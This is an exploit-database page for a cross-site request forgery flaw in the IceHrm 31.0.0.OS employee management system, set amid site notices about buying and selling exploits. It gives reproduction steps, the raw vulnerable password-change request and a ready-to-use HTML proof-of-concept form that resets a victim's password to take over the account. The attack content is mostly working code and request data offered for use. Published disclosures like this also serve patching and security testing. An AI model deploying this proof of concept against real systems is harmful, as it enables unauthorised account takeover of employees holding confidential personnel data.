0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ICEHRM 31.0.0.0S - Cross-site Request Forgery to Account Takeover Vulnerability
[# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
#Tested on: Windows 10
1. About - ICEHRM
IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.
2. Description:
The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.
3. Steps To Reproduce:
- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password.
- Now login into the application using his credentials and navigate to Update Password Feature to change the password.
- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used.
- Finally using Burpsuite create CSRF POC and save it as exploit.html.
- Now change the password in the POC to any password we want.
- Finally we open this POC in the same browser session and click on the submit button.
- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover.
4. Vulnerable Request:
GET
/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123
","pwd":"Dummy@123"} HTTP/1.1
Host: localhost:8070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)
Gecko/20100101 Firefox/98.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer:
http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information
Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
5. Exploit POC (exploit.html)
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8070/app/service.php">
<input type="hidden" name="t" value="Employee" />
<input type="hidden" name="a" value="ca" />
<input type="hidden" name="sa" value="changePassword" />
<input type="hidden" name="mod" value="modules=employees" />
<input type="hidden" name="req"
value="{"current":"Test@123","pwd":"Dummy@123"}"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# 0day.today [2024-11-16] #